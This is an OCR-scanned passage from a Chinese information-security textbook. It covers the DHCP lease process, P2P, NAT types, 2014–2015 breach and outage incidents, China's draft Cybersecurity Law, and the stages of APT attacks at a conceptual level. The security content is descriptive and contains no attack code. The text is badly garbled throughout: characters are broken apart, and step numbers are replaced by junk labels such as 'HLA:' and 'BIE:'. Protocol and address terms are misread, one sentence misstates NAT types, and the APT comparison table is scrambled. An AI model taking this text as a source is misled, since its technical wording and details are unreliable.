DHCPINEORM 客户 发 向 服务 器 的 消息 ， 要 求 服务 器 发 送 本 地 配置 信息 ， 客 户 已 


经 配置 好 了 网 络 地 址 ， 不 需要 再 发 送 网 络 地 址 了 


(4) DHCP 的 工作 过 程 

DHCP 采用 客户 服务 器 的 工作 方式 。 具 体 工作 过 程 如 下 : 

第 一 步 : DHCP 服务 器 打开 UDP67 端口 ， 监 听 请 求 ; 

第 二 步 : DACP 客户 从 端口 68 利用 UDP 向 服务 嚣 发送， 寻找 DHCP 服务 器 ; 

第 三 步 : 收 到 DHCPDISCOVER 报 文 的 DHCP 服务 器 都 发 出 DHCPOFFER 报 文 作 


为 应 答 ; 
第 四 步 : DHCP 客户 从 多 个 DHCP 服务 器 中 选择 一 个 ， 然 后 向 其 发 送 
DHCPREQUEST 报 文 ; 


HLA: DHCP 服务 器 回 送 DHCPACK， 包 含 分 配 的 他 地 址 ; 

第 六 步 : 租用 期 过 了 一 半 ，DHCP 客户 发 送 请 求 报 文 DHCPREQUEST 要 求 更 新 租 
用 期 ; 

BW: DHCP 服务 器 车 同意 ， 则 发 回 确认 报 文 DHCPACK. DHCP 客户 得 到 了 新 
的 租用 期 ， 重 新 设置 计时 器 ; 

BIE: DHO 服务 器 若 不 同意 ， 则 发 回 否 认 报 文 DHCPNACK。 这 时 DHCP 客户 
必须 立即 停止 使 用 原来 的 他 地址 ， 而 必须 重新 申请 人 P 地 址 ( 回 到 步 又 第 二 步 ); 

BILL: DACP 客户 可 随时 提前 终止 服务 器 所 提供 的 租用 期 ， 这 时 只 需 向 DHCP 服 
务 器 发 送 释放 报 文 DHCPRELEASE 即 可 。 

另外 ， 若 DHCP 服务 器 不 响应 步骤 第 六 步 的 请 求 报 文 DHCPREQUEST， 则 在 租用 
期 过 了 87.5% 时 ,DHCP 客户 必须 重新 发 送 请 求 报 文 DHCPREQUEST( 重 复 步 又 第 六 步 )， 
然后 又 继续 后 面 的 步骤 。 

7. P2P (PeertoPeer) 应 用 协议 

(1) 概述 

传统 的 Internet 应 用 几乎 都 采用 了 C/S 模式 。 另 一 种 模式 应 用 模式 叫 点 对 点 的 应 用 ， 
即 “peer-to-peer”， 缩 写 为 P2P。 这 种 模式 不 同 于 C/S 以 服务 器 为 中 心 ， 它 没有 客户 机 和 
服务 器 的 区 别 ， 每 个 主机 既是 服务 器 也 是 客户 机 ， 既 从 其 他 主机 获取 资源 ， 同 时 又 为 其 
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他 主机 提供 资源 。 以 前 人 们 下 载 文件 是 从 服务 器 上 ， 而 P2P 则 是 多 个 终端 用 户 各 下 载 一 
部 分 ， 然 后 互相 下 载 ， 这 样 大 量 用 户 同 时 下 载 不 但 不 会 造成 堵塞 ， 反 而 速度 加 快 。 

(2) P2P 的 优势 

@ 非 中 心 分 散 化 : 将 以 服务 器 为 中 心 的 服务 分 散 到 各 个 网 络 节点 ， 避 免 出 现 服务 器 
性 能 瓶颈 ; 

@ 扩 展 性 : 随 着 更 多 的 用 户 加 入 ， 网 络 整体 资源 和 服务 得 到 了 提升 和 扩充 ; 

@ 健 壮 稳定 性 : 网 络 自 组 织 管理 ， 网 络 中 某 一 节点 或 局 部 网 络 出 现 问题 对 整个 网 络 
不 会 有 很 大 的 影响 ; 

图 资源 共享 : 能 有 效 地 利用 网 络 中 闲置 的 硬件 资源 进行 计算 、 存 储 ; 

@ 优 化 传播 速度 : 数据 传播 是 直接 在 节点 之 间 传 送 的 ， 因 此 当 用 户 数据 增加 时 ， 其 
数据 传播 速度 会 大 大 加 强 。 

8. 网 络 地 址 转换 NAT 

因特网 的 IP 地 址 有 本 地 地 址 和 全 球 地 址 两 类 。 本 地 地 址 仅 在 机 构 内 部 使 用 ,由 本 机 
构 自 行 分 配 ， 而 不 需要 向 因特网 的 管理 机 构 申 请 。 全 球 地址 顾名思义 在 全 球 唯一 的 ， 必 
须 向 因特网 的 管理 机 构 申 请 。 由 于 本 地 地 址 可 以 由 机 构 自 行 分 配 ， 所 有 人 都 可 以 同时 使 
用 , 在 一 定 程度 上 缓解 了 IP 地 址 不 足 的 问题 。 但 因特网 中 的 所 有 路 由 器 对 目的 地 址 是 本 
地 地 址 的 数据 报 一 律 不 进行 转发 。 这 就 需要 使 用 网 络 地 址 转换 NAT (Network Address 
Translation)。 通 常 由 路 由 器 或 专用 NAT 设备 担任 IP 转换 的 功能 ， 且 要 在 专用 网 连接 到 
因特网 的 路 由 器 或 专用 设备 上 安装 NAT 软件 , 装 有 NAT 软件 的 路 由 器 叫做 NAT 路 由 器 ， 
它 至 少 有 一 个 有 效 的 外 部 全 球 地 址 。 

静态 NAT 有 三 种 类 型 : 静态 NAT、 动 态 地 址 NAT、 端 口 地 址 转换 PAT. 

静态 NAT 设置 起 来 最 为 简单 和 容易 ,内 部 网 络 中 的 每 个 主机 都 被 永久 映射 成 某 个 全 
球 地 址 。 

动态 方式 ， 以 地 址 池 的 方式 。 地 址 池 中 有 多 个 全 球 地 址 用 来 对 内 部 地 址 进行 映射 ， 
但 不 国定 绑 定 。 

端口 地 址 转换 PAT: 一 个 外 网 地 址 可 以 和 多 个 内 网 地 址 〈 如 一 个 网 段 ) 进行 映射 ， 
同时 在 该 地 址 上 加 上 一 个 由 NAT 设备 指定 的 TCP/UDP 的 端口 号 来 进行 区 分 。 通 过 使 用 
PAT 可 以 让 成 百 上 千 的 本 地 地 址 节点 使 用 一 个 全 球 地 址 访问 Internets PAT 普遍 应 用 于 接 
入 设备 中 , 它 可 以 将 中 小 型 的 网 络 隐藏 在 一 个 合法 的 下 地 址 后 面 。 通 过 这 种 方式 把 内 部 
主机 隐藏 起 来 ， 从 而 实现 了 内 部 主机 的 安全 性 。 


3.2 ”网络 安全 的 基本 概念 


3.2.1 网 络 安全 事件 
如 今 ， 互 联网 的 发 展 日 新 月 异 ， 互 联网 技术 已 经 深度 融入 到 人 们 生活 的 方方面面 ， 
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衣食 住 行 、 支 付 、 理 财 、 通 信 等 全 都 与 互联 网 离 不 开关 系 。 但 同时 ， 因 为 网 络 具 有 开放 
性 、 隐 蔽 性 、 路 地域 性 等 特性 ， 存 在 很 多 安全 问题 或 待 解决 。 日 常生 活 中 ， 网 络 安全 事 
件 也 时 常 发 生 。 本 章 将 列举 2014 年 和 2015 年 发 生 的 一 些 重大 网 络 安全 事件 。 
3.2.1.1 ”信息 泄露 事件 

近 些 年 来 ， 信 息 泄 露 成 为 网 络 安全 事件 中 非常 突出 的 一 类 事件 ， 以 2015 年 为 例 ， 
国际 上 就 发 生 过 很 多 信息 泄露 事件 ， 如 美国 人 事 管 理 局 OPM (TheOfficeofPersonnel 
Management) 数据 泄露 ，2700 万 政府 雇员 及 申请 人 信息 泄露 ， 直 接 导 致 主管 引咎 辞职 ; 
美国 第 二 大 医疗 保险 公司 Anthem8000 万 客户 及 员工 信息 泄露 , 丢失 数据 包括 用 户 姓名 、 
出 生日 期 、 客 户 ID、 社 会 保险 码 、 地 址 、 电 话 号 码 、 邮 件 地 址 等 ; 面向 全 球 的 婚外恋 网 
站 AshleyMadison3700 万 用 户 信息 泄露 ，2015 年 8 月 ， 黑 客 团队 “ImpactTeam” 公 布 了 
从 该 网 站 窃取 的 近 10G 的 用 户 数据 ， 最 初 ， 攻 击 者 向 AshleyMadison 网 站 开 出 的 条 件 堪 
称 义 正言 辞 一 一 即刻 永久 关闭 AshleyMadison， 和 否则 将 会 有 更 多 更 详细 的 数据 流出 。 后 
续 事 件 的 转变 略 显 突然 :“ImpactTeam” 在 发 给 AshleyMadison 用 户 的 邮件 中 称 ， 可 以 支 
付 1.0000001 比特 币 〈 约 合 225 美金 》 到 黑客 的 账户 中 以 换取 泄露 数据 的 永久 删除 ， 意 
大 利 间 谍 软 件 公 司 HackingTeam 被 黑 ， 包 括 各 种 平台 的 木马 程序 ( 含 源 代码 )、 未 公开 
漏洞 (0day)、 大 量 电子 邮件 与 各 种 商业 合同 、HackingTeam 公司 内 部 部 分 员工 的 个 人 资 
料 和 密码 …… 讽 刺 的 是 ， 失 窃 的 绝 大 部 分 数据 本 是 HackingTeam 公司 用 不 光彩 手段 所 采 
集 ， 其 中 多 个 零 日 漏洞 、 入 侵 工具 和 大 量 工作 邮件 及 客户 名 单 的 400G 数据 被 传 到 网 上 
任意 下 载 ， 英 宽带 运营 商 TalkTalk 被 反复 攻击 ，400 余 万 用 户 隐 私 数据 最 终 泄露 ， 摩 根 
EFR 35 万 客户 信息 涉嫌 被 员工 盗 取 ; 日 养老 金 系统 遭 网 络 攻击 ， 上 百 万 份 个 人 信息 泄 

纵 观 世界 风云 ， 国 内 也 并 不 能 幸免 ， 如 社保 系统 漏洞 曝光 ，30 余 个 省 市 的 社保 、 户 
籍 查询 、 疾 控 中 心 等 系统 存在 高 危 漏洞 ， 仅 社保 类 信息 安全 漏洞 涉及 数据 就 达到 5279.4 
万 条 ， 包 括 身份 证 、 社 保 参 保 信息 、 财 务 、 薪 酬 、 房 屋 等 敏感 信息 ;乌云 爆料 称 : 网 易 
的 用 户 数 据 库 疑似 泄露 ， 影 响 数据 总 共 数 亿 条 ， 泄 露 信息 包括 用 户 名 、MD5 密码 、 密 码 
提示 问题 /答案 (hash)、 注 册 他 、 生 日 等 ,网 易 邮 箱 绑 定 的 其 他 账户 也 受到 波及 , 如 iPhone 
用 户 的 AppleID 等 ; 国家 旅游 局 漏洞 致 6 套 系统 沦陷 ， 涉 及 全 国 6000 万 客户 、60000 多 
旅行 社 账号 密码 、 百 万 导游 信息 ， 并 且 攻 击 者 可 利用 该 漏洞 进行 审核 、 拒 签 等 操作 。 通 
过 该 漏洞 ， 安 全 工作 者 获取 了 一 则 长 长 的 名 单 ， 能 够 直接 观看 到 每 位 用 户 的 详细 行程 及 
个 人 信息 。 

这 些 信息 泄露 事件 的 影响 面 各 有 不 同 ， 美 国人 事 管 理 局 OPM 上 升 到 国 与 国之 间 的 
网 络 战争 ， 美 国 第 二 大 医疗 保险 公司 Anthem 和 社保 系统 主要 事 关 客户 个 人 保险 号 和 病 
历 ， 全 球 的 婚外恋 网 站 AshleyMadison 则 主要 为 隐私 和 道德 问题 ， 已 有 两 人 因此 事 而 自 
杀 。 意 大 利 间谍 软件 公司 HackingTeam 的 影响 主要 在 于 工程 化 的 漏洞 和 后 门 代码 公开 ， 
等 于 把 网 络 武器 交 到 不 法 人 员 的 手中 ， 轻 易 地 提高 了 整个 地 下 黑 产 的 平均 技术 水 平 。 


第 3 章 网 络 安全 基础 


3.2.1.2 ”网 络 故障 事件 

2014 年 1 月 21 日 下 午 3 点 10 分 左右 ， 国 内 通用 项 级 域 的 根 服务 器 忽然 出 现 异 常 ， 
导致 众多 知名 网 站 出 现 DNS 解析 故障 ， 用 户 无 法 正常 访问 。 虽 然 国内 访问 根 服务 器 很 
快 恢 复 ， 但 由 于 DNS 缓存 问题 ， 部 分 地 区 用 户 “ 断 网 ”现象 仍 持续 了 数 个 小 时 ， 至 少 
有 2/3 的 国内 网 站 受到 影响 。 事 故 发 生 期 间 ， 超 过 85% 的 用 户 遭 遇 了 DNS 故障 ， 引 发 网 
速 变 慢 和 打 不 开 网 站 的 情况 。 

2015 年 5 月 11 日 晚上 21 点 左右 ， 网 易 旗 下 网 易 云 音乐 、 易 信 、 有 道 云 笔记 等 在 内 
的 数 款 产品 以 及 全 线 游戏 出 现 了 无 法 连接 服务 器 的 情况 , 影响 着 近 亿 用 户 , 其 中 包含 400 
万 游戏 用 户 。 网易 官 方 发 布 公告 称 ,“ 因 骨干 网 络 出 现 异常 , 导致 网 易 旗 下 部 分 游戏 及 网 
站 论坛 暂时 无 法 登录 ， 技 术 人 员 已 经 在 抢修 中 。” 直 到 5 月 12 日 早上 6 点 多 ， 大 部 分 产 
品 才 恢 复 正常 。 

携程 在 2015 年 5 月 28 日 尴 估 地 创下 了 国内 互联 网 公司 系统 瘫痪 的 新 纪录 ， 宕 机 长 
达 12 小 时 。 对 于 宕 机 的 原因 ， 携 程 做 了 “不 明 攻击 ”与 “员工 操作 失误 ”两 次 相 异 的 解 
释 。 无 论 真实 原因 为 何 ，12 小 时 的 宕 机 造成 携程 的 直接 损失 已 超过 千 万 。 
3.2.1.3 ”恶意 代码 事件 

2015 年 9 月 17 日 ， 网 上 消息 曝光 非 官方 下 载 的 苹果 开发 环境 Xcode 中 包含 恶意 代 
码 ， 会 自动 向 编译 的 App 应 用 注入 信息 窃取 和 远程 控制 功能 。 经 确认 ， 包 括 微 信 、 网 易 
云 音乐 、 高 德 地 图 、 滴 滴 出 行 、 铁路 12306, 甚至 一 些 银行 的 手机 应 用 均 受 影响 。AppStore 
上 超过 3000 个 应 用 被 感染 。 该 事件 不 仅 打 破 了 苹果 系统 的 安全 神话 , 也 成 为 了 今年 国内 
影响 最 大 的 安全 事故 。 

2015 年 ，PaloAltoNetworks 公司 破获 了 XcodeGhost， 这 是 一 款 会 感染 iOS 应 用 程序 
的 恶意 软件 , 在 被 发 现 之 前 就 已 经 在 苹果 的 AppStore 应 用 程序 商店 存在 几 个 月 了 。 这 种 
攻击 依赖 于 iOS 的 开发 人 员 下 载 某 个 版 本 的 Xcode, 一 款 iOS 的 开发 工具 包 的 编译 工具 。 
这 种 工具 链 并 不 是 一 种 新 的 攻击 方法 ,但 XcodeGhost 在 感染 开发 人 员 方 面 获得 了 规模 非 
常 广泛 的 成 功 。 

在 开发 人 员 将 其 iOS 应 用 程序 提交 到 AppStore 之 前 就 已 经 受到 恶意 软件 感染 , 而 这 
种 方式 完全 是 新 的 。PaloAltoNetworks 公司 的 情报 总 监 赖 安 。 奥 尔 森 说 。 开 发 商 是 很 脆 
弱 的 ， 攻 击 者 可 以 借助 他 们 的 应 用 程序 进入 到 苹果 公司 的 应 用 程序 商店 AppStore， 从 而 
绕 过 苹果 公司 的 安全 管理 措施 。 

虽然 XcodeGhost 恶意 软件 并 不 是 特别 危险 ， 但 其 却 以 开创 性 的 方式 感染 了 数 以 百 
万 计 的 设备 。XcodeGhost 向 人 们 展示 了 即使 是 苹果 公司 的 围墙 也 可 以 被 突破 ， 并 且 是 大 
范围 的 。 其 迫使 应 用 程序 开发 人 员 必 须 清理 他 们 的 系统 ， 重 新 提交 自己 的 应 用 程序 ， 并 
在 获得 他 们 的 开发 工具 方面 变 得 更 慎重 。 而 为 了 打击 类 似 的 攻击 ，iOS 的 开发 人 员 需 要 
更 加 了 解 他 们 的 开发 系统 。 XcodeGhost 是 第 一 款 真 正 影响 广泛 的 针对 非 越狱 手机 的 恶意 
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软件 ， 它 让 那些 曾 以 为 苹果 是 无 懈 可 击 的 1OS 用 户 们 大 开眼 界 。 
3.2.1.4 漏洞 利用 事件 

2014 年 3 月 22 日， 有 安全 研究 人 员 在 第 三 方 漏洞 收集 平台 上 报 了 一 个 题目 为 “ 携 
程 安全 支付 日 志 可 遍历 下 载 导 致 大 量 用 户 银行 卡 信 息 泄露 (包含 持 卡 人 姓名 身份 证 、 银 
行 卡号 、 卡 CVV 码 、6 位 卡 Bin)” 的 漏洞 。 上 报 材料 指出 携程 安全 支付 日 志 可 遍历 下 
载 ， 导 致 大 量 用 户 银行 卡 信 息 泄露 ， 并 称 已 将 细节 通知 厂商 并 且 等 待 厂 商 处 理 中 。 一 石 
激 起 千 层 浪 ， 该 漏洞 立即 引发 了 关于 “ 电 商 网 站 存储 用 户 信用 卡 等 敏感 信息 ， 并 存在 泄 
露 风 险 ” 等 问题 的 热 议 。 

2014 年 4 月 爆 出 了 心脏 出 血 漏洞 Heartbleed， 该 漏洞 是 近年 来 影响 范围 最 广 的 高 危 
漏洞 ， 涉 及 各 大 网 银 、 门 户 网 站 等 。 该 漏洞 可 被 用 于 窃取 服务 器 敏感 信息 ， 实 时 抓 取 用 
户 的 账号 密码 。 从 该 漏洞 被 公开 到 漏洞 被 修复 的 这 段 时 间 内 ， 己 经 有 黑客 利用 OpenSSL 
漏洞 发 动 了 大 量 攻 击 ， 有 些 网 站 用 户 信息 或 许 已 经 被 黑客 非法 获取 。 未 来 一 段 时 间 内 ， 
黑客 可 能 会 利用 获取 到 的 这 些 用 户 信 息 ， 在 互联 网 上 再 次 进行 其 他 形式 的 恶意 攻击 ， 针 
对 用 户 的 “次 生 和 危害 ”( 如 网 络 诈骗 等 ) 会 大 量 集中 显现 。 即 使 是 在 今后 十 年 中 ,预计 仍 
会 在 成 千 上 万 台 服 务 器 上 发 现 这 一 漏洞 ， 甚 至 包括 一 些 非 常 重要 的 服务 器 。 
3.2.1.5 ”法 律 制度 制定 

2015 年 6 月 ， 第 十 二 届 全 国人 大 常委 会 第 十 五 次 会 议 初 次 审议 了 《中 华人 民 共 和 国 
网 络 安全 法 (草案 )》( 以 下 简称 草案 )。7 月 6 日 ， 草 案 公 布 ， 征 求 公众 意见 。 草 案 共 7 
章 68 条 , 涉及 网 络 设备 设施 安全 、 网 络 运行 安全 、 网 络 数据 安全 、 网 络 信息 安全 等 方面 。 
草案 有 以 下 4 大 亮点 : 

CL) 用 户 不 实名 禁 提供 服务 。 网 络 运 营 者 为 用 户 办 理 网 络 接 入 、 域 名 注册 服务 ， 办 
理 固定 电话 、 移 动 电话 等 入 网 手续 ， 或 者 为 用 户 提供 信息 发 布 服务 ， 应 当 要 求 用 户 提供 
真实 身份 信息 。 用 户 不 提供 真实 身份 信息 的 ， 网 络 运营 者 不 得 为 其 提供 相关 服务 。 

(2) 阻 断 违法 信息 传播 。 网 络 运营 者 应 加 强 对 其 用 户 发 布 的 信息 的 管理 ， 发 现 法 律 、 
行政 法 规 禁 止 发 布 或 者 传输 的 信息 ， 应 立即 停止 传输 该 信息 ， 采 取消 除 等 处 置 措施 。 国 
家 网 信 部 门 和 有 关 部 门 发 现 法 律 、 行 政法 规 禁 止 发 布 或 者 传输 的 信息 ， 应 要 求 网 络 运营 
者 停止 传输 ， 采 取消 除 等 处 置 措施 ， 并 保存 有 关 记 录 。 对 于 来 自 境外 的 此 类 信息 ， 应 通 
知 有 关机 构 采 取 技 术 措 施 和 其 他 必要 措施 阻 断 信息 传播 。 对 违反 者 给 予 相 应 处 罚 。 

G) 重大 事件 时 可 限制 网 络 。 因 维护 国家 安全 和 社会 公共 秩序 ， 处 置 重大 突 发 社会 
安全 事件 的 需要 ， 国 务 院 或 者 省 、 自 治 区 、 直 辖 市 人 民政 府 经 国务 院 批准 ， 可 以 在 部 分 
地 区 对 网 络 通信 采取 限制 等 临时 措施 。 

(4) 出 售 公民 个 人 信息 最 高 10 倍 违法 所 得 罚款 。 网 络 运营 者 对 其 收集 的 公民 个 人 
信息 必须 严格 保密 ， 不 得 泄露 、 算 改 、 毁 损 ， 不 得 出 售 或 者 非法 向 他 人 提供 。 任 何 个 人 
和 组 织 不 得 窃取 或 者 以 其 他 非法 方式 获取 公民 个 人 信息 ， 不 得 出 售 或 者 非法 向 他 人 提供 
公民 个 人 信息 。 依 法 负 有 网 络 安全 监督 管理 职责 的 部 门 ， 必 须 对 在 履行 职责 中 知悉 的 公 
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民 个 人 信息 、 隐 私 和 商业 秘密 严格 保密 ， 不 得 泄露 、 出 售 或 者 非法 向 他 人 提供 。 

建设 网 络 强国 ， 是 国家 主席 习近平 提出 的 宏伟 战略 目标 。 要 有 效 实现 这 一 目标 ， 离 
不 开 坚实 有 效 的 制度 保障 ， 正 是 在 此 背景 下 , 《网 络 安全 法 (草案)》 应 运 而 生 。《 网 络 安 
全 法 〈 草 案 )》 的 出 台 ， 是 中 国 在 迈 向 网 络 强国 道路 上 至 关 重 要 的 阶段 性 成 果 ， 意 味 着 建 
设 网 络 强国 、 维 护 和 保障 中 国 国家 网 络 安全 的 战略 任务 ， 正 在 转化 为 一 种 可 执行 、 可 操 
作 的 制度 性 安排 ， 预 示 着 建设 网 络 强国 的 制度 保障 正在 努力 迈 出 坚实 的 一 步 。 


3.2.2 APT 


当今 ， 网 络 系统 面临 着 越 来 越 严重 的 安全 挑战 ， 在 众多 的 安全 挑战 中 ， 一 种 具有 组 
织 性 、 特 定 目标 性 以 及 长 时 间 持 续 性 的 新 型 网 络 攻击 日 益 猩 狐 ， 国 际 上 常 称 之 为 APT 
(AdvancedPersistentThreat 高 级 持续 性 威胁 ) 攻击 。 
3.2.2.1 APT 简介 

APT 攻击 是 一 种 以 商业 或 者 政治 目的 为 前 提 的 特定 攻击 ， 其 通过 一 系列 具有 针对 性 
的 攻击 行为 以 获取 某 个 组 织 甚至 国家 的 重要 信息 ， 特 别 是 针对 国家 重要 的 基础 设施 和 单 
位 开展 攻击 ， 包 括 能 源 、 电 力 、 金 融 、 国 防 等 等 。APT 攻击 常常 采用 多 种 攻击 技术 手段 ， 
包括 一 些 最 为 先进 的 手段 和 社会 工程 学 方法 ， 并 通过 长 时 间 持 续 性 的 网 络 渗透 ， 一 步 步 
获取 内 部 网 络 权 限 ， 此 后 便 长 期 潜伏 在 内 部 网 络 ， 不 断 地 收集 各 种 信息 ， 直 至 窃取 到 重 

一 般 APT 攻击 过 程 可 概括 为 3 个 阶段 : 攻击 前 准备 阶段 、 攻 击 入 侵 阶段 和 持续 攻击 
阶段 ， 又 可 细 分 为 5 个 步 又: 情报 收集 、 防 线 突破 、 通 道 建立 、 横 癌 渗 透 、 信 息 收 集 及 
外 传 ， 如 图 3-30 所 示 。 


攻击 前 准备 攻击 入 侵 持续 攻击 


= A Ei 
通道 建立 国 图 mrsa BE ERN 


图 3-30 APT 攻击 过 程 
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1. 情报 收集 

在 实施 攻击 之 前 ， 攻 击 者 会 针对 特定 组 织 的 网 络 系统 和 相关 员工 展开 大 量 的 信息 搜 
集 。 信 息 搜集 方法 多 种 多 样 ， 通 常 包括 搜 索引 擎 、 礁 网 系统 、 网 络 隐蔽 扫描 、 社 会 工程 
学 方法 等 方式 。 信 息 来 源 包括 相关 员工 的 微 博 、 博 客 、 社 交 网 站 、 公 司 网 站 ， 甚 至 通过 
某 些 渠 道 购买 相关 信息 (如 公司 通讯 录 等 )。 攻击 者 通过 对 这 些 信息 的 分 析 , 可 以 清晰 地 
了 解 攻击 目标 所 使 用 的 应 用 、 防 御 软件 ， 组 织 内 部 架构 和 人 员 关 系 ， 核 心 资产 存放 情况 
等 等 。 于 是 ， 攻 击 者 针对 特定 目标 《一般 是 内 部 员工 ) 所 使 用 的 应 用 软件 寻找 漏洞 ， 并 
结合 特定 目标 所 使 用 的 杀毒 软件 、 防 火 墙 等 设计 特定 木马 / 恶意 代码 以 绕 过 防御 。 同 时 ， 
攻击 者 搭建 好 入 侵 服务 器 ， 开 展 技术 准备 工作 。 

2. 防线 突破 

攻击 者 在 完成 情报 收集 和 技术 准备 后 ， 开 始 采用 木马 / 恶意 代码 攻击 特定 员工 的 个 
人 电脑 ， 攻 击 方法 主要 有 : @ 社 会 工程 学 方法 ， 如 电子 邮件 攻击 ， 攻 击 者 窃取 与 特定 员 
工 有 关系 的 人 员 ( 如 领导 、 同 事 、 朋 友 等 ) 电子 邮箱 ， 冒 充 发 件 人 给 该 员工 发 送 带 有 恶 
意 代 码 附件 的 邮件 ， 一 旦 该 员工 打开 附件 ， 员 工 电脑 便 感染 了 恶意 软件 。@ 远 程 漏洞 攻 
击 方法 ， 如 网 站 挂 马 攻 击 ， 攻 击 者 在 员工 常 访问 的 网 站 上 放置 木马 ， 当 员工 青 次 访问 该 
网 站 时 ， 个 人 电脑 便 受 到 网 页 代码 攻击 。 由 于 这 些 恶 意 软件 针对 的 是 系统 未 知 漏洞 并 被 
特殊 处 理 ， 因 此 现 有 的 杀毒 软件 和 防火 墙 均 无 法 察觉 ， 攻 击 者 便 能 逐渐 获取 个 人 电脑 权 
限 ， 最 后 直至 控制 个 人 电脑 。 

3. 通道 建立 

攻击 者 在 突破 防线 并 控制 员工 电脑 后 ， 在 员工 电脑 与 入 侵 服务 器 之 间 开 始 建立 命令 
控制 通道 。 通常 ,命令 控制 通道 采用 HTTP/HTTPS 等 协议 构建 ， 以 突破 电脑 系统 防火 墙 
等 安全 设备 。 一 旦 攻击 者 完成 通道 建立 ， 攻 击 者 通过 发 送 控制 命令 检查 植 入 的 恶意 软件 
是 否 遭 受 查 杀 ， 并 在 恶意 软件 被 安全 软件 检测 到 前 ， 对 恶意 软件 进行 版 本 升级 ， 以 降低 
被 发 现 的 概率 。 

4. 横向 渗透 

入 侵 和 控制 员工 个 人 电脑 并 不 是 攻击 者 的 最 终 目的 ， 攻 击 者 会 采用 口令 窃听 、 漏 洞 
攻击 等 多 种 渗透 方法 尝试 进一步 入 侵 组 织 内 部 更 多 的 个 人 电脑 和 服务 器 ， 同 时 不 断 地 提 
升 自己 的 权限 ， 以 求 控制 更 多 的 电脑 和 服务 器 ， 直 至 获得 核心 电脑 和 服务 器 的 控制 权 。 

5. 信息 收集 及 外 传 

攻击 者 常常 长 期 潜伏 ， 并 不 断 实行 网 络 内 部 横向 渗透 ， 通 过 端口 扫描 等 方式 获取 服 
务 器 或 设备 上 有 价值 的 信息 ， 针 对 个 人 电脑 通过 列表 命令 等 方式 获取 文档 列表 信息 等 。 
攻击 者 会 将 内 部 某 个 服务 器 作为 资料 暂 存 的 服务 器 ， 然 后 通过 整理 、 压 缩 、 加 密 、 打 包 
的 方式 ， 利 用 建立 的 隐蔽 通信 通道 将 信息 进行 外 传 。 在 获取 这 些 信息 后 ， 攻 击 者 会 对 这 
些 信息 数据 进行 分 析 识 别 ， 并 做 出 最 终 的 判断 ， 甚 至 实施 网 络 攻击 破坏 。 

APT 攻击 与 传统 攻击 相 比 存在 较 大 区 别 ， 如 表 3-7 所 示 。 与 传统 攻击 相 比 ，APT 攻 
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击 具有 更 强 的 组 织 性 ， 其 攻击 目标 更 加 明确 、 攻 击 手段 更 加 复杂 ， 造 成 的 危害 也 更 大 。 


表 3-7 APT 攻击 与 传统 攻击 区 别 

对 比 内 容 APT 攻击 
攻击 者 特征 “| 个 体 或 小 组 织 网 络 犯罪 分 子 ee ee eer 
any | REG, AKUERE, Renna, 通过 针对 国家 安全 信息、 
市 目标 | 以 达到 获取 人 金钱、 盗窃 身份 、 坎 诈 等 | 重要 行业 商业 机 密 信息 等 
maga | EERE AEE ORE | 攻击 手段 复杂 , REA, 结合 0day Bo, 


软件 展开 攻击 特种 木马 攻击 、 社 会 工程 学 等 展开 攻击 
攻击 时 间 | SOTERA, KEES ATED | aink, KR AEN 


攻击 痕迹 攻击 特征 弱 ， 比 较 隐蔽 ， 缺 少 样本 数据 ， 
检测 和 捕获 很 难 被 检测 和 捕获 
3.2.2.2 ”我 国 面临 的 威胁 
据 数据 显示 ， 中 国 是 APT 攻击 的 主要 受害 国 ， 如 图 3-31 所 示 ， 国 内 多 个 省 、 市 受 
到 不 同 程度 的 影响 ， 其 中 北京 、 广 东 是 重 灾 区 ， 行 业 上 科研 教育 、 政 府 机 构 是 APT 攻击 
的 重点 关注 领域 。 


图 3-31 国内 用 户 受 影响 情况 〈2014 年 12 月 -2015 年 11 H) 


Back 


信息 安全 工程 师 教程 


APT 组 织 主要 攻击 行业 分 布 ( 2014 年 12 月 -2015 年 11 月 ) 
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图 3-32 APT 组 织 主要 攻击 行业 分 布 (2014 年 12 月 -2015 年 11 H) 


如 图 3-32 所 示 ， 从 近年 的 统计 来 看 ， 针 对 科研 教育 机 构 发 起 的 攻击 次 数 最 多 ， 占 到 
了 所 有 APT 攻击 总 量 的 37.4%; 其 次 是 政府 机 构 ， 占 27.8%; 能 源 企 业 排 第 三 ， 占 9.1%。 
其 他 被 攻击 的 重要 领域 还 包括 军事 系统 、 工 业 系统 、 商 业 系统 、 航 天 系统 和 交通 系统 等 。 

统计 显示 ， 仅 仅 在 2015 年 ，APT 组 织 发 动 的 攻击 行动 ， 至 少 影响 了 中 国境 内 超过 
万 台电 脑 ， 攻 击 范围 遍布 国内 31 个 省 级 行政 区 。 

另外 2013 年 曝光 的 斯 诺 登 事件 ， 同 年 Norman 公布 的 HangOver 组 织 ， 卡 巴 斯 基 在 
2014 年 揭露 的 Darkhotel 组 织 和 2015 曝光 的 方程 式 组 织 (EquationGroup) 等 ， 这些 国 外 
安全 厂商 和 机 构 发 现 的 APT 组 织 ， 都 直接 证 明了 中 国 是 APT 攻击 中 的 主要 受害 国 。 

APT 组 织 从 中 国 科研 、 政 府 机 构 等 领域 窃取 了 大 量 敏 感 数据 ， 对 国家 安全 已 造成 严 
重 的 危害 。 其 中 APT-C-05 组 织 是 一 个 针对 中 国 攻击 的 境外 APT 组 织 ， 也 是 数据 显示 针 
对 中 国 攻 击 持续 时 间 最 长 的 一 个 组 织 ， 该 组 织 主要 针对 中 国政 府 、 军 事 、 科 技 和 教育 等 
重点 单位 和 部 门 ， 相 关 攻 击 行动 最 早 可 以 追溯 到 2007， 至 今 还 非常 活跃 。 从 2007 年 开 
始 APT-C-05 组 织 进行 了 持续 8 年 的 网 络 间谍 活动 , 并 主要 针对 微软 OfEce 和 WPS 等 文 
档 文件 。 

针对 中 国 的 APT 攻击 主要 由 低 成 本 的 攻击 组 成 , 主要 由 于 相关 防御 薄弱 导致 低 成 本 
攻击 频频 得 手 。 邮 件 攻击 和 网 站 攻击 依然 是 APT 组 织 最 青睐 的 攻击 方式 , 其 中 邮件 攻击 
占 主流 。 攻 击 者 常常 使 用 漏洞 利用 技术 ， 意 图 达到 未 授权 安装 执行 的 目的 ， 不 仅 如 此 ， 
漏洞 的 使 用 还 能 保证 二 进 制 PE 程序 能 躲避 杀毒 软件 的 检测 。 攻 击 组 织 一 般 都 掌握 着 或 
多 或 少 的 Oday 漏洞 ， 不 过 考虑 到 成 本 问题 ， 他 们 更 倾向 使 用 day 和 Nday 漏洞 展开 
攻击 。 

针对 中 国 相关 目标 群体 的 攻击 手段 常常 “ 量 身 定制 ” 主要 体现 在 诱饵 信息 内 容 制 
